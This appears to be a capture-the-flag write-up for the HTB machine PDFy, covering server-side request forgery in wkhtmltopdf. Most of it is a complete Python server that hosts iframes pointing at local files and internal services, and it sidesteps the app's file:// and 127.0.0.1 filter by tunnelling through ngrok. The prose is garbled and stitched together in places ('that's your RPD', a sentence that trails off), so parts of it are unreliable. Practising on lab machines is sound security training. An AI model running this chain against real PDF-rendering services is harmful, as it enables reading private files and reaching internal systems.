The SSRF vulnerability in wkhtmltopdf can be triggered by inserting an iframe that points to an internal asset's IP address or a local file: when the converter renders the page it fetches the embedded resource and prints its contents into the generated PDF. One caveat: wkhtmltopdf 0.12.6 and later refuse file:// URLs unless the converter is run with --enable-local-file-access, so the local-file read only works against an older build or a deployment that passes that flag; fetching internal HTTP services is not affected by that default.
Because the application filters out any direct payload string containing file:// or 127.0.0.1, we cannot provide a malicious URI straight into the input form. We must orchestrate an exploitation chain: host the iframe on a server we control and submit only that server's URL, so the blocked strings never appear in the form input.
Submit a benign live website (e.g., http://google.com) to check that the app functions properly.
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
First read /home/john/user.txt. Now read /tmp/root.txt – that's your RPD.
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:
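The attacker side of that chain, as an added example that is not part of the original write-up or of PDFy: a small Python server that hosts the iframe page so the blocked strings live on our host rather than in the submitted URL, plus a copy of the app's filter (as the page describes it) to check a URL before submitting it and a User-Agent check that confirms the fetch came from wkhtmltopdf. The target list, the listening port 8000, the internal service on port 8080 and the ngrok hostname are assumptions for illustration.

```python
"""
Added example (not from the original write-up): attacker-side helper for the
wkhtmltopdf SSRF chain.  The web app rejects submitted URLs containing
"file://" or "127.0.0.1", so those strings are moved into a page we host; the
form only ever sees our server's public (e.g. ngrok) hostname.  Targets, ports
and the ngrok hostname are assumptions.
"""
import html
import http.server
import socketserver

# Filter behaviour as described on the page: direct payloads with these substrings are rejected.
BLOCKED_SUBSTRINGS = ("file://", "127.0.0.1")

# Assumed targets: the two local files named on the page and a hypothetical internal HTTP service.
DEFAULT_TARGETS = (
    "file:///home/john/user.txt",
    "file:///tmp/root.txt",
    "http://127.0.0.1:8080/",  # hypothetical internal service on the converter host
)


def passes_app_filter(submitted_url: str) -> bool:
    """Mimic the target app's blocklist so a URL can be checked before it is submitted."""
    return not any(bad in submitted_url for bad in BLOCKED_SUBSTRINGS)


def build_payload(targets=DEFAULT_TARGETS, width=1000, height=600) -> str:
    """HTML page that makes wkhtmltopdf fetch each target and render it into the PDF.

    The explicit frame size matters: wkhtmltopdf prints only what fits inside the
    iframe, so a small default frame can truncate the file contents.
    """
    frames = "\n".join(
        f'<iframe src="{html.escape(t, quote=True)}" width="{width}" height="{height}"></iframe>'
        for t in targets
    )
    return f"<!DOCTYPE html><html><body>\n{frames}\n</body></html>\n"


def is_converter_request(user_agent: str) -> bool:
    """wkhtmltopdf's default Qt WebKit User-Agent contains 'wkhtmltopdf'; seeing it in
    the access log confirms the converter, not our own browser, fetched the page."""
    return "wkhtmltopdf" in (user_agent or "").lower()


class PayloadHandler(http.server.BaseHTTPRequestHandler):
    """Serve the iframe page on every path and log who fetched it."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        tag = "converter" if is_converter_request(ua) else "other"
        self.log_message("fetched %s by %s (%s)", self.path, tag, ua)
        body = build_payload().encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Assumed workflow: run this, then `ngrok http 8000`, and submit the ngrok URL to the app.
    public_url = "https://example.ngrok-free.app/"  # placeholder, not a real tunnel
    assert passes_app_filter(public_url)
    assert not passes_app_filter("file:///etc/passwd")
    with socketserver.TCPServer(("0.0.0.0", 8000), PayloadHandler) as srv:
        print("serving payload on :8000; expose it with ngrok and submit the public URL")
        srv.serve_forever()
```

If the PDF comes back with empty frames for the file:// targets but the 127.0.0.1 frame renders, the converter is most likely a 0.12.6+ build without --enable-local-file-access; the internal-service SSRF still works in that case, only the local-file read is lost.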